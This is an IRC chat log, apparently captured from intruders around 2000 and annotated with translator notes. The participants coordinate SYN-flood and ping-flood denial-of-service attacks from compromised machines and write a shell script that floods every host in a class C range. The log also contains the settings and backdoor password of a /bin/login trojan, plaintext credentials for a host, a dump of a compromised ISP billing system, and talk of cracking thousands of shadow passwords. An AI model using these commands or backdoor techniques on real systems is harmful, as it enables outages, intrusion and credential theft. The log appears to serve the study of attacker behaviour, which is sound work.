:kaos__ nick nutsack :D1ck :kaos___ nick dumbly :D1ck :%kaos____ nick rewted :D1ck :kaos_____ nick bate :D1ck :_aos_____ nick anarchy :D1ck :kaos____ nick cutlose :D1ck :.add D1ck * D1ck 100 1 4 :D1ck :.save :D1ck :_aos_____ nick duke :D1ck :J4n3 :D1ck ::) :J4n3 :D1ck nick SeXyGuy19 :D1ck :there? :D1ck :hahaa :J4n3 :yeah :) :D1ck : /nick SeXyGuy19 :J4n3 :heh :D1ck ::) :D1ck :hh :D1ck :;) :D1ck :cool bots? :D1ck :.add J4n3 * J4n3 100 1 4 :D1ck :.save :D1ck :oye :D1ck :we have to change the key :D1ck :.join # :J4n3 :humm :D1ck :heh :D1ck :lagged :D1ck :worldtel sucks. :J4n3 :heh why change the key ? :D1ck :oye :D1ck :J4n3 :D1ck :load shells :D1ck :we have to dos :D1ck :i am ready with 4 :D1ck :u load 4-5 :D1ck :dos RR :D1ck :and :D1ck :Deadrat :J4n3 :hermm :D1ck :ok????????? :J4n3 :wait :D1ck :please :D1ck :192.168.6.223 :D1ck :and :D1ck :./syn 0 192.168.6.223 1 1024 :D1ck :ok just dos this 38 wala with 2 boxes :D1ck :and the other with rest :D1ck :coz i`m dosing it :D1ck :./s2 0 192.168.6.223 1 1024 :J4n3 :humm ok :D1ck :okies :D1ck :thanks :D1ck :me dosing too :D1ck :./syn 0 192.168.6.223 1 1024 :D1ck :oye sun u dosing? :D1ck :started? :J4n3 :yup :J4n3 :lagging badlay yaara :D1ck :oye :D1ck :he changed hosts :D1ck : Signon by DeadRat :D1ck :oye stop dos on him :D1ck :and dos :D1ck :node177190.example.edu :J4n3 :hmm :J4n3 :waito :J4n3 :./syn 0 node177190.example.edu 1 1024 :D1ck :./syn 0 192.168.177.190 1 1024 :D1ck :nope ip :J4n3 :yeah yeah :D1ck :thanks :D1ck ::) :J4n3 ::O) :D1ck :thanks J4n3 :D1ck :me also dosing :D1ck :boh dossed :D1ck :both :D1ck ::) :J4n3 :hehe :D1ck :heh :D1ckhack :.part :D1ck :.join # :D1ck :.join # :J4n3 :oye what happened ? :J4n3 :oey :D1ckhack :ACTION is away: (Auto-Away after 15 mins) [BX-MsgLog On] :D1ck :ACTION is away: (Auto-Away after 15 mins) [BX-MsgLog On] :J4n3 :oye shn1p3r :J4n3 :D1ck reply man :J4n3 :i'll tell u a kewl way :p :J4n3 :new trick :p :J4n3 :reboot windows heeh with no programz :J4n3 :D1ck :D1ckhack :.op :D1ckhack :.up :D1ck :J4n3 :D1ck ::) :D1ck :sup baby :J4n3 :u on winbl0ws ? :D1ck :nope :D1ck ::) :D1ck :128 bots :J4n3 :oh :J4n3 :i c :J4n3 :lol yeah :J4n3 :oye i can reboot any win98 machine :p :D1ck :kewl :D1ck :0-day? :J4n3 :hahaha no sploit :D1ck :do u use ath0.c by th0m45? :J4n3 :just a simple ping command :p :D1ck :can d/c any one :D1ck :hahahahaha :D1ck :2b2b2b2000db :D1ck :? :J4n3 :no but it works only with zoltrix modem :J4n3 :and it disconnects urself too :( :J4n3 :noooooo :J4n3 ::p :D1ck :2b2b2b415448300d :J4n3 :noooooooooooo :D1ck :oh :J4n3 ::p :D1ck :send me the coce :D1ck :i will make a shell script :J4n3 :haha abay simple online command of ping :J4n3 :and it will reboot any win98 machine or hang it :D1ck :kewl :D1ck :give me the ping command :J4n3 :but :J4n3 :works with linux only :J4n3 :and if u do it with ur own box, it will kill u with lag :J4n3 :do it from a linux rewt :J4n3 :in 1 minute it will dc and hang the system :J4n3 :command is :J4n3 :ping -f -s 65000 :pPPpPp :D1ck :kewl :D1ck :wait :J4n3 :ok but dont try it on me :/ :J4n3 ::/ :D1ck :# :D1ck :if [ $# :D1ck :echo " " :D1ck :echo "[*] Usage $0 IP" :D1ck :echo "[*] ping reboot any win 9.x machine by D1ck, Idea by J4n3." :D1ck :echo " " :D1ck :exit :D1ck :else :D1ck :ping -f -s 65000 $1 :D1ck :fi :D1ck :kewl :D1ck :? :J4n3 :lol set :J4n3 :tyte :D1ck :give me some ips :D1ck :hehehe :D1ck :dont worry :J4n3 :try it on 192.168.68.163 :D1ck :oye :D1ck :i made a script :D1ck :u can reboot ever user of a class c :D1ck :with this :D1ck :./reboot.sh 192.168.252 :J4n3 :oh no :D1ck :will reboot ever uses using this :D1ck :kewl? :J4n3 :shit no :J4n3 :wahi ping command ? :D1ck :heheh :D1ck :wait :D1ck :i`m making it :J4n3 :kewl kewl bana, phir syn and smurf kaa kaam khatam :P :J4n3 :but bnc walon ka nahin hoga :( :J4n3 :unkay liye syn hee sahi hai :D1ck :yep :D1ck :? :D1ck :oye how many ppl know about it? :J4n3 :no one :J4n3 :except moi :p :J4n3 :dont spread it :p :J4n3 :i've seen it written somewhere in a txt of some sploit :J4n3 :but its not common, and no one know about it yet :D1ck :kewl :D1ck :oye done :D1ck :i`ll send u ina phew :J4n3 :kewl kewl :P :J4n3 :okies :) :J4n3 :try it on some isp :D1ck :yep :D1ck :oye J4n3 :D1ck :give me some isp :D1ck :which should i n3wk :D1ck :? :J4n3 :hmmm :J4n3 :try satnet naa :D1ck :?hahha :D1ck :ok :D1ck :192.168.2? :D1ck :192.168.25/? :D1ck :? :J4n3 :hmm :J4n3 :192.168.25.* :D1ck :./rebootclass.sh 192.168.25.1 :J4n3 :kewl lets see :D1ck :............................................................................................................................................................................................................................................................................................................................................................... :D1ck :one sec :D1ck :let me see :D1ck :i think i`ll have to write a looop :D1ck :but lets see :J4n3 :hmm ok :D1ck :ooops :D1ck :i frgot to chmod +x a file hehe :D1ck :fixed :J4n3 ::?? :J4n3 :lol :J4n3 :ok :D1ck :done :D1ck :lets see if they ping out :D1ck :join #delusion :D1ck :and see :D1ck :?P :J4n3 :ok wait :D1ck :oye :D1ck :are u sure this command works? :D1ck :give me some ip :D1ck :i`ll d.c them :J4n3 :100 % :J4n3 ::p :J4n3 :when i try it on a single ip, it goes down 101 % :J4n3 :haven't found one who didn't go offline :D1ck :oye :D1ck :u there? :D1ck :J4n3 :D1ck :fucking worldtel :D1ck :fucking worldtel :D1ck :fucking worldtel :D1ck :fucking worldtel :D1ck :fucking worldtel :D1ck :fucking worldtel :D1ck :sux muh azz :D1ck ::) :D1ck :'az'' :D1ck :accept the script :D1ck :hmmm :D1ck :? :D1ck :J4n3 :D1ck :world tel :D1ck :sux :D1ck :J4n3 :D1ck :NEW KEY J4n3 :D1ck :get it :D1ck ::) :D1ckhack :ACTION is away: (MOVIE #@$@ :D1ck :ACTION is away: (MOVIE #@$@ :D1ck :pnp sux :D1ck :pnp sux :J4n3 :lol still ? :D1ck :when i double click i want the chaninfo with topic bans etc :D1ck :it gives me a input box, to write topic :D1ck :blah :D1ck :heh :J4n3 :HAHAHAHAH :J4n3 :lol :D1ck ::P :J4n3 :J4n3 :J4n3 :J4n3 :D1ck :(@az): and what's with the topic :D1ck :*** BigPoppa changes topic to 'booop' :D1ck :(@az): owning g|nger` ? :D1ck :*** DeadRat sets mode: +o h4r33 :D1ck :l3w| :J4n3 :hehe :D1ck :(symetrix`): im a korjap :D1ck :(@h4r33): 24.143.24.1 :D1ck :(@h4r33): its my uplink and its unkillable :D1ck :(@h4r33): sure you can kill me but you can't take the uplink down :D1ck :(@h4r33): HAHAAAAAAAAAAAA :D1ck :(@madcow-): why would you want to kill your uplink? :D1ck :* symetrix` munches on some rice :D1ck :(@h4r33): mother fuckin uplink is DEAD :D1ck :he thinks dosing is 'COO'L' *shrug* :J4n3 :lol :D1ck :(@BigPoppa): diz :D1ck :(@BigPoppa): has there ever been something you couldnt kill? :D1ck :(@madcow-): me :D1ck :(@madcow-): :) :D1ck :(@h4r33): not yet :D1ck :oye :D1ck :come to windows :D1ck :and i`m loading up 30+ of my shells :D1ck :to dos :D1ck :u load too :J4n3 :i am in windows :J4n3 :and ready to dos :D1ck :if u want :J4n3 :just give me the IP :D1ck :if u dont we will do it another day :D1ck ::) :J4n3 :i have 11 boxes ready :D1ck :kewl :D1ck :let me load up :J4n3 :kkz :D1ck :how many boxes? :J4n3 :11 :D1ck :oki :D1ck :[*] Loading Boxens.... :J4n3 :heh :J4n3 :ip ? :J4n3 :my 11 boxes r enuff to take down anyone :p :D1ck :lol :D1ck ::) :J4n3 ::) :J4n3 :ogin: root :J4n3 :Password: :J4n3 :Sun Microsystems Inc. SunOS 5.7 Generic October 1998 :J4n3 :These are the times that try anybody's soul. :J4n3 :A bird in the hand can bite. :J4n3 :You have mail. :J4n3 :# cd /dev/".. "/sun2/packet :J4n3 :# :D1ck :system.example.com :D1ck :oye :D1ck :do this :D1ck :dig @system.example.com version.bind chaos txt :D1ck :and paste me what u get :J4n3 :i'm on windows :J4n3 :where ?? :J4n3 :from any box ? :D1ck :oh :D1ck :try if dig works :J4n3 :wait :J4n3 :VERSION.BIND. 0S CHAOS TXT "8.2.1" :J4n3 :; <<>> DiG 8.2 <<>> @system.example.com version.bind chaos txt :J4n3 :; :J4n3 :;; FROM: gujarat to SERVER: system.example.com 192.168.244.99 :J4n3 :;; Total query time: 467 msec :J4n3 :;; ANSWER SECTION: :J4n3 :;; version.bind, type = TXT, class = CHAOS :J4n3 :;; QUERY SECTION: :J4n3 :;; flags: qr aa rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 0 :D1ck :LOL :J4n3 :;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 10 :D1ck :LOL :D1ck :LOL :D1ck :LOL :D1ck :LOL :D1ck :LOL :J4n3 :;; got answer: :D1ck :I WILL OWN IT :J4n3 :;; res options: init recurs defnam dnsrch :J4n3 :; (1 server found) :J4n3 :; (1 server found) :J4n3 :hehe :J4n3 :who's this ? :D1ck :BWHAHAHAHAHA :D1ck :h4r33^ :D1ck :i`ll own it :D1ck :lamer cant even path his box :J4n3 :kewl :J4n3 :tight :J4n3 :kar kar own kar :D1ck :heh :D1ck :he's such a lamer :D1ck :let me reboot :D1ck :brb :D1ck :brb :J4n3 :heh okies :D1ck :oye :D1ck :u there? :J4n3 :yeah :D1ck :my NS is getting 43503495-43-593 quries :D1ck ::?( :D1ck ::( :J4n3 :huh :J4n3 ::/ :D1ck :lol :J4n3 :what's the chances ? :D1ck :100% if my NS is working like yesterday :D1ck :shit i think named is dead :J4n3 :oh :( :D1ck :;; res_nsend to server system.example.com 192.168.244.99: Connection timed out :D1ck :som one is dosing em :D1ck :or :D1ck :some thing is wrong :J4n3 :hmmm :J4n3 :try later :D1ck :k :D1ck :system.example.com :D1ck :remember :D1ck :i will own it tonight :J4n3 :yeah :J4n3 :sure :D1ck ::P :D1ck :hurry its important :D1ck : :D1ckhack :ACTION is away: (Auto-Away after 15 mins) [BX-MsgLog On] :D1ck :ACTION is away: (Auto-Away after 15 mins) [BX-MsgLog On] :J4n3 :D1ck :J4n3 :what happened ?? sorry main neechay gaya tha :J4n3 :kuch khaanay :D1ck :np :D1ck :never mind :D1ck :yaar :D1ck :i was wondering :D1ck :when we change login :D1ck :admin cant login :D1ck :so thats fucked? :D1ck :linux :D1ck :? :J4n3 :hmmm :J4n3 :yahi main humesha sochta hon :J4n3 :lekin i think aisa nahin hai :J4n3 :unka login chaltha hai :D1ck :nope :D1ck :it doesnt workl :D1ck :i tried :J4n3 :what ?? i mean u dont know what admin pass is :D1ck :login: dynamic :D1ck :Password: :D1ck :Login incorrect :D1ck :login: dynamic :D1ck :Password: :D1ck :that sux :D1ck :i`m doing it with my box :D1ck :send me the root/owned :D1ck :let me try that :J4n3 :hmm its on linux :/ :J4n3 :wait wait :D1ck :shit :J4n3 :try my zippy.example.org :D1ck ::( :D1ck :oki :D1ck :k :D1ck :user/pass? :J4n3 :user : micr0n :J4n3 :pass : ashunkla :D1ck :k :D1ck :name? :D1ck :of the file :D1ck :never mind :D1ck :brb i have to change their normal login :D1ck :brb :J4n3 :oye :J4n3 :linux.tar hai :J4n3 :D1ck :D1ck :J4n3 :D1ck :? :J4n3 :oye can j0e know the key of K1dd13 ??? :D1ck :yep :D1ck :he can :J4n3 :ok thanx :) :J4n3 :i trust him 100 % :) :D1ck :kewl :D1ck :oye :D1ck :dos h4r33 :D1ck :so i can jupoe him and annoy ircops :D1ck :like i always do : :D1ck ::P :D1ck :and get him glined :D1ck :and #delusion is edge of being purge :J4n3 :oh yaar i have to lead shell's again, sub band kardeen , sonay ja raha tha, if u say i :J4n3 :load again :J4n3 :waisay channel #delusion tho pehlay bee purge hogaya tha, benchodon nay dubara layliya :D1ck :no :D1ck :its ok :D1ck ::) :D1ck :coz rr did :D1ck :rr is my freind :D1ck :rr is freinds with danny (the personm who purged it) :J4n3 :oh oh :J4n3 :kewl :D1ck :and diz sucked rr ballz to give him w and he will own his soul to him :J4n3 :i wish get it purged :D1ck :so rr decided he would help em if he doesnt say lame shit :D1ck :so thats what happened :J4n3 :ahaaaaan :J4n3 :now rr want to purge it again ? :D1ck :yep :D1ck :he wants to :D1ck :but his relations with opes isnt as good as before :D1ck :he is trying :D1ck :can u dos him with 2 shells plls :D1ck ::/ :D1ck :only 2 :D1ck :not more :J4n3 :hmm kewl :) :D1ck ::P :D1ck ::P :J4n3 :ok wait :D1ck :thanks :D1ck :thanks :J4n3 :naa now i'll load 8 to 10 wait :D1ck :hehe :D1ck :no no :D1ck :jani :D1ck :u need 2 shells for diz .xx :D1ck ::LP :J4n3 :hehe wait naa already loaded 5 :D1ck :hehe :D1ck :thx :D1ck ::) :J4n3 :ok what's the iP ? :D1ck :hehe :D1ck :192.168.1.99 :J4n3 :hmmm hold on :D1ck :ok :J4n3 :what's his nick ? :D1ck :h4r33 :D1ck :unet is lagged :D1ck :MEWHEHEHE :D1ck : Signoff by h4r33 :D1ck :kewl :D1ck ::)))) :J4n3 :he will go down soooooon :D1ck : *** h4r33 has quit IRC (Ping timeout for :D1ck : h4r33[ns3.example.net.xx]) whats he doing in :D1ck : the place :D1ck :pheared :D1ck : :J4n3 :fuck i emailed them, but donno the address :/ sent to root postmaster, support sales help :J4n3 :but donno they got it or not, :D1ck :no man :D1ck :i have their main 15 MB PIPE hub :D1ck :the whole example depend on :J4n3 :kewl :D1ck ::P :D1ck :yep :D1ck :stop it :h4r33 ::P :J4n3 :wtf ? :D1ck :? :D1ck :that was me :J4n3 :errrrrrrrrr :J4n3 :lol :D1ck :lol :J4n3 :He He He He :D1ck ::P :J4n3 :oye what's the bnc pass for ns2.example.net ? :j0e :uffo ehhe :j0e :itnay saray bots :J4n3 :hehe :D1ck :hey j0e :D1ck :hehe :D1ck :hey J4n3 :j0e :lol :Sp07 :lots of bots :D1ck :`im missing 50 :Sp07 :hehe :Sp07 :set up crontab :Sp07 :on each one :D1ck :.join #7thsphere :D1ck :.part #7thsphere :Sp07 :.part #7thsphere :Sp07_ :7th(2k) using ..15cryptonik 14ice 14(15alpha14) :Sp07 :d1ck :Sp07 :make me a bnc on a fast server =D :D1ck :kaos___ nick nameserver :D1ck :heh :Sp07 :oc3 :Sp07 :hehe :Sp07 :why dont you make some vhosts? :Sp07 :with your nameservers :Sp07 :hehe :Sp07 :K1dd13.timenet.net :D1ck :hehe :D1ck :Sp07.rooted.his.first.box.from.timenet.net :D1ck :hehe :Sp07 :hehe :D1ck :i`ll point :D1ck :later :D1ck :its 9 am :D1ck :and i dint sleep :Sp07 :hehe :Sp07 :sleep is for wussies :D1ck :kaos__ nick freebsd :D1ck :kaos___ nick jin :Sp07 :its 9 pm and I still didnt study for this test :D1ck :hahahha :D1ck :kaos__ nick netb :D1ck :kaos___ bbiab :D1ck :kaos___ nick bbiab :D1ck :.save :D1ck :ACTION is away: (Auto-Away after 15 mins) [BX-MsgLog On] :Sp07 :d1ck you here? :D1ck :.join #7thsphere :acidklown :txdcc01 :txdcc01 :txdcc01 :txdcc01 Check it out :txdcc01 :txdcc01 :Gemru^wu :Sp07 :Sp07 :zmasterz :Gemru^wu :D1ck :.part #7thsphere :D1ck :.part #7thsphere :Sp07 :thats a lot of bots :Sp07 :heh :Sp07 :thats a lot of ping timeouts :Sp07 :hehe :D1ck :.part #7thsphere -=- Day 09 June 12 :Sp07 :wtf? :D1ck :dont know :Sp07 :G *kaos@211.46.* 960874933 Banned *kaos@211.46.*[60] until Tue Jun 13 06:38:24 2000 [960871104]: too many bots :Sp07 :G *kaos@195.231.251.* 960874857 Banned *kaos@195.231.251.*[1] until Tue Jun 13 06:37:08 2000 [960871028]: too many bots :Sp07 :thats fucking gay :D1ck :yure #7thsphere freidns :D1ck :gling them? :ath0_ :Sp07 :nope :Sp07 :it was me :Sp07 : :Sp07 :jk :D1ck :thanks gay :D1ck : :D1ck ::( :Sp07 :#eggdrops people isnt oping me =( :Sp07 :yo :D1ck :i`m making accounts on local isp :D1ck :for freinds :D1ck ::( :D1ck :? :Sp07 :can you help me dos something? :Sp07 :192.168.13.233 :D1ck :nope :D1ck :11 :D1ck :and i`m going to bed :D1ck :soryr :D1ck :sorry :D1ck ::) :D1ck ::) :J4n3 :errrrrrrr :D1ck :oye :J4n3 :where r all bawts ? :D1ck :i have the whole billing system :D1ck :glined :D1ck :i have the whole billing system of example :D1ck :oye :D1ck :heh :J4n3 :lol :J4n3 :glined how ? :J4n3 :they didn't have the same ip :J4n3 :billing system of example ?? :J4n3 :how ? :D1ck :too many bots :D1ck :yep :D1ck :example ki file :D1ck :oye J4n3 :D1ck :only elite freinds should get :D1ck :like j0e :D1ck :and rsnake :D1ck :coz then they all give it ot :D1ck ::P :J4n3 :yeah :D1ck :and we can use it more :J4n3 :hmm like ? :D1ck ::P :J4n3 :lol rnsake :J4n3 :Rsnkae :D1ck :? :D1ck :? :D1ck :[root@K1dd13 billing]# ls :D1ck :add_hours.sh monitor.sh~ usage_reporter.sh~ :D1ck :add_hours.sh~ nms_monitor.sh~ user_bought_hours.sh :D1ck :add_user_hours.sh sum.sh user_usage_report.sh :D1ck :balance_hours.sh temp.sh~ user_usage_report.sh.old.1 :D1ck :check_user.sh time_to_minutes.sh user_usage_report.sh~ :D1ck :create_users.sh update_all_users.sh user_used_hours.sh :D1ck :data update_user_usage.sh user_used_hours.sh~ :D1ck :enabled.sh usage_reporter.sh :D1ck :[root@K1dd13 bin]# ls :D1ck :a delete_users.sh m r set_bin_passwd_shell.sh :D1ck :c get_first_line_and_delete.sh ma radius.sh sync.sh :J4n3 :hehe :D1ck :[root@K1dd13 monitor_bin]# ls :J4n3 :kewl kewl :D1ck :monitor.sh monitor.sh~ start_atrc_nms.sh start_atrc_nms.sh~ :J4n3 :oye where is passwd file ? :D1ck :[root@K1dd13 passwd_bin]# ls :D1ck :text_password_to_des.pl :D1ck :[root@K1dd13 passwd_bin]# :J4n3 :abay Account add kar na vip phir Hey why dont you add the VIP account? :D1ck :hehehe i did :J4n3 :oh ye phelay ka copy karliya tha / oh this has been copied from previous (stuff) :D1ck :it got deleted :J4n3 :oh :( :D1ck ::P :J4n3 :acha iska passwd file kaha hai ? Ok where is its passwd file? :D1ck :oye crack kar :D1ck :oye crack kar Yo crack it Yo crack it :J4n3 :lekin unshadow karna hoga na phir crack hoga But we will have to unshadow it before cracking it :D1ck :why do u want it? :D1ck :i gave u shadow :D1ck :with passwords :J4n3 :oh :J4n3 :wait :D1ck :;p :J4n3 :oye only 126 passes on it ? :D1ck :nope :D1ck :5438 shadow :D1ck :5438 :J4n3 :errr then why it showing 128 :/ :D1ck :hehe dunno :D1ck ::P :J4n3 :nahin nahi sahi hai no no it is correct :J4n3 :may be its a error :D1ck :oh :J4n3 :coz speed is very slow of cracking :D1ck :oh :J4n3 :agar 126 hothay tho is waqth thak complete hojatha hehe if there were only 126, it would have completed by this time :J4n3 :its still on 0 % :D1ck :what? :D1ck :oh :J4n3 :D1ck ka bacha :J4n3 :daal daal kacha [note: this guy is teasing D1ck - by some colloquial rhyme] :D1ck :heh :D1ck ::/ :D1ck :koi isp bata give me some ISPs :D1ck :jis ko hax0r karo that we can hax0r :D1ck :? :D1ck :J4n3 :D1ck :a prson elite like u :D1ck :shouldnt hang in #karachi :D1ck ::P :D1ck :simple, straight karachi and #dleusion is full of lamers :D1ck :heh :D1ck :J4n3 :D1ck ::P :D1ck : /kick J4n3 :J4n3 :loool :D1ck :seriously ayar :D1ck :yaar yaar = pal :D1ck :+ :D1ck :it's h1gh :D1ck :who sed so much about u :D1ck :./fuck backstabbers :D1ck :simple. :J4n3 :hahah abay i'm the admin there plus rob hai koi tho elitee hona chaiyee in lamerz main hahah... hey i am the admin there plus theres someone called "rob" who's wanting to become elite in lamerz main :J4n3 :plus meri bachiyaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaannnnnNNNN :J4n3 :plus meri bachiyaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaannnnnNNNN :J4n3 :plus meri bachiyaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaannnnnNNNN :J4n3 :plus meri bachiyaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaannnnnNNNN plus my kiddiesssssssssssssss plus my kiddiesssssssssssssss plus my kiddiesssssssssssssss :D1ck ::P :D1ck :k :D1ck ::) :D1ck :oye today is 13th july? :D1ck :oye today is 13th junbe :D1ck :? :J4n3 :no :J4n3 :12 :D1ck :oh :D1ck :gline 12th ko hatay ga gline will be removed on 12th :J4n3 :june :J4n3 :hmm :J4n3 :it meanz aaj raatjh ya kal it means either tonight or tomorrow :J4n3 :coz :J4n3 :states main abi 11 haI because in the states (US) it is still 11 :D1ck :shit :D1ck :ACTION is away: (Auto-Away after 15 mins) [BX-MsgLog On] :zeeshan_S :zeeshan_S :D1ck :k-rad- say KEWL :k-rad- :KEWL :D1ck :le say KEWL :le :KEWL :D1ck :hey J4n3 NICK pencil USER werd . . :DoS NOTICE AUTH :*** Looking up your hostname NOTICE AUTH :*** Checking Ident NOTICE AUTH :*** No ident response NOTICE AUTH :*** Found your hostname :graz.at.Eu.UnderNet.org 465 pencil : use another server. ERROR :Closing Link: pencil by graz.at.Eu.UnderNet.org (K-lined) NICK pencil USER werd . . :DoS :D1ck :i tried a login trojan :Sp07 :yah :D1ck : /bin/login :D1ck :when n i change it :D1ck :the admin cant acess the box? :D1ck :i was thinking this the other day :Sp07 :of course they can :D1ck :they admin cant access the box? :D1ck :no :Sp07 :what does the trojan do? :D1ck :i tried it :Sp07 :yes they can :Sp07 :depends on what the trojan does :D1ck :in my own box :Sp07 :like I use the bj trojan :D1ck :i cp -f login.trojan /bin/login :Sp07 :the admin will still be able to login :D1ck :no :D1ck :oh :D1ck :send me bj.c :D1ck :send me bj.c :D1ck :send me bj.c :D1ck :send me bj.c :D1ck :send me bj.c :D1ck :#@$ :Sp07 :I dont got it :Sp07 :hehe :Sp07 :hold on let me check for it somewhere :D1ck :#@$ :D1ck :ok :Sp07 :I do have it :Sp07 :hehe :D1ck :PLEASE GET ME :D1ck ::) :Sp07 :you know how to use it right? :D1ck :welp :D1ck :may login trojans dont work :D1ck :i tried like 7-8 :D1ck :and that sucks :D1ck :ofcourse :D1ck :TERM=pass :D1ck :telnet owned.com :D1ck :bash# :D1ck :uname -a;id :D1ck :root root root :D1ck :heh :Sp07 :make you change the pass for each box you own :Sp07 :make sure you change the pass for each box you own :Sp07 :accept :Sp07_ :accept it :Sp07_ :hurry I got to eat breakfast soon :D1ck :k :D1ck ::P :Sp07_ :umm :Sp07 :#define SHELL "/bin/sh" :Sp07 :#define SHELL_CALLME "login" :Sp07 :#define LOGIN "/usr/bin/xcat" :Sp07 :#define LOGIN_CALLME "login" :Sp07 :#define ENV_NAME "TERM" :Sp07 :#define ENV_VALUE "rh6ps0" :Sp07 :#define ENV_FIX "vt100" :Sp07 :#define LOGIN "/usr/bin/xcat" :Sp07 :#define LOGIN "/usr/bin/xcat" :Sp07 :for that :Sp07 :you have to move the old login there :Sp07 :cp /bin/login /usr/bin/xcat :Sp07 :#define ENV_VALUE "rh6ps0" :Sp07 :and thats the password right there :D1ck :oh :Sp07 :change it for each box you own :D1ck :why? :D1ck :why? :Sp07 :cause someone can hack one of your boxes :Sp07 :and get the password :Sp07 :got to go eat :Sp07 :brb :D1ck :i have 100+ :D1ck :i change for each box? :D1ck :nohup_ say hehe :Sp07 :fix my dick ho :D1ck :nohup say heh :nohup :heh :D1ck :nohup userlist :Sp07 :nohup act suck Sp07 dick :Sp07 :do that :Sp07 :do that :Sp07 :do that :D1ck :nohup Sp07=/dev/null :D1ck :[nohup(dcc)] [23:39] (D1ck) linking Sp07 to /dev/null :D1ck :.add D1ck * D1ck 100 1 4 NOTICE D1ck :Handle D1ck is already in use :D1ck :.save NOTICE D1ck :Lists saved to file emech233.users NOTICE D1ck :Levels were written to ./mech.levels :D1ck :nohup_ :D1ck :nohup_ say hehe :D1ck :nohup___ say hehe :Sp07 :ADD DISEASE * DISEASE 10000000000 :Sp07 :mwuahhaha :D1ck :hahaha :D1ck :i own u :desire :D1ck :nohup____ say heh :nohup_ :nohup__ :D1ck :nohup____ say hehee :D1ck :HPUX say hi :D1ck :Sp07 :D1ck :what date is it in the us? :D1ck :12? :D1ck : :D1ck :13? :Sp07 :I dont know :Sp07 :hehe :D1ck :coz my glined will be off :Sp07 :let me go check :D1ck :13 :D1ck ::( :D1ck :no :D1ck :seriously :D1ck :? :Sp07 :12 :D1ck :shit :D1ck :fuck :D1ck :FUCK GRID :D1ck :dosing :D1ck ::( :Sp07 :uh hu hu hu hu huh :Sp07 :shutup beavis :D1ck :man :D1ck :i want to own 45329543294093249-3954395495-9340593-95r34-95-2349959234-593-49534-95-4395-349542-93 :D1ck ::P :D1ck :Sp07 :D1ck :ACTION fingers Sp07 :D1ck :ACTION fingers Sp07's pussy :D1ck :u are a girl Sp07 ? :D1ck :right? :Sp07 :NIO :Sp07 :NO :Sp07 :when I say suck my dick :Sp07 :what do you think I mean? :Sp07 :hehe :D1ck :HEH :D1ck :ehhe :D1ck :hehe :D1ck :i lost ns2.example.net :D1ck ::( :D1ck :coz of diz :D1ck :well :D1ck :he tried 32094-249-23 bad logins :Sp07 :=( :Sp07 :dont you run sniffers? :Sp07 :oh yea :Sp07 :its that 1 :D1ck :i rooted it btw :D1ck :the BIG PALACE HUB :D1ck :FOR MORE TEN 32409182390408 CLIENTS [note: well I wonder who these guys are - that whole country must be in an outage because they dont have very many pipes going in and out of there] :D1ck :IT WAS A 15 MB PIPE :D1ck :well :Sp07 :A PIPE :D1ck :2000000 MB :Sp07 :2 gigabytes? :Sp07 :or wait :Sp07 :i cant count :Sp07 :hehe :D1ck :but man :Sp07 :too blurry :D1ck :it was fast :Sp07 :uh huh :Sp07 :he owned you? :D1ck :no :D1ck :h4r33 and own me :D1ck :hehe :D1ck :diz == script kids :D1ck :diz == script kid :D1ck :he cant even code :D1ck :or read shell codes :D1ck :if i send him a trojan :Sp07 :hahaha :Sp07 :he will use it? :D1ck :shell code directed to 127.0.0.1 :D1ck :he will use it :D1ck :hahaha :Sp07 :just like you used my bj.c :Sp07 :and now I owned you :Sp07 :hahahha :Sp07 :j/k :Sp07 : =) :Sp07 :? :Sp07 :what happened? :D1ck__ :D1ck :what was my quit? :D1ck :what was my quit? :Sp07 :didnt you see it? :Sp07 :hahaha :Sp07 :you came in :Sp07 :[09:52] *** D1ck__ (~dynamic@orff.example.net) has joined :Sp07 :[09:52] *** inetd-s sets mode: +o D1ck__ :Sp07 :[09:52] ? :Sp07 :[09:52] *** D1ck has quit IRC (Read error to D1ck[orff.example.net]: Connection reset by peer) :D1ck :what was my quit? :D1ck :what was my quit? :D1ck :oh :D1ck : SignOff D1ck: #botsex,#lecole,#Linuxsex,&partyline (Read error to :D1ck : D1ck[orff.example.net]: Connection reset by peer) :Sp07 :hahahahahaha :Sp07 :=D :D1ck ::) :D1ck :did u hack me :D1ck :and killall -9 BitchX? :D1ck ::( :D1ck :Sp07 HACKE DME :D1ck :ME :D1ck :i am scanning 216.55 :Sp07 :? :Sp07 :did you see what I said before you quit? :D1ck :D1ck :nope :D1ck :what did u sya? :Sp07 :[09:50] just like you used my bj.c :Sp07 :[09:50] and now I owned you :Sp07 :[09:50] hahahha :Sp07 :[09:50] j/k :Sp07 :[09:50] =) :D1ck :oh :D1ck :yep :Sp07 :[09:54] [09:50] just like you used my bj.c :Sp07 :[09:54] [09:50] and now I owned you :Sp07 :[09:54] [09:50] hahahha :Sp07 :[09:54] [09:50] j/k :Sp07 :[09:54] [09:50] =) :D1ck :hehehe :D1ck :IRIX say heh :IRIX :heh :Sp07 :did yo hack irix? :D1ck :no :D1ck :its a bot :D1ck :from redhat :Sp07 :hehehe :D1ck :=P :D1ck :dude :D1ck :if u give me lodgic :D1ck :of finding IRIX :D1ck :i`ll make my own scanner :D1ck :but :D1ck :i need some sort of a hint :D1ck :i never used IRIX before, except for once :Sp07 :if I give you what? :D1ck :hint :Sp07 :hint? :D1ck :heh :D1ck :never mind :D1ck :let me check my jp.log [note: jp.log seems to be a list of hosts from Japan, xx.log where xx is a TLD] :D1ck :heh :D1ck :in couple of weeks :Sp07 :ok :D1ck :unet will gline :D1ck :* :D1ck :and :D1ck :* :D1ck :ll :D1ck :lol :Sp07 :heh :D1ck :=P :D1ck :i`ll make a script ./script roots.txt :D1ck :it will check bj on all boxes :D1ck :if true :D1ck :then it will keep if not it will grep -v :D1ck :it will be easier :D1ck :hehe :Sp07 :umm :Sp07 :whats the point if you dont know the bj password? :Sp07 :hehe :D1ck :i know :D1ck :its my bj :D1ck ::P :Sp07 :oh :D1ck : like i`d sugest,a admin should always find .kr* .jp.log, coz hackers uslly scan that, and it's quite possible that if u find such log u are vuln. :D1ck :THATS LAME :D1ck :i just got that from my quotes.txt :D1ck :Sp07 :D1ck :u have CERT KEY :D1ck :? :Sp07 :cert key ? 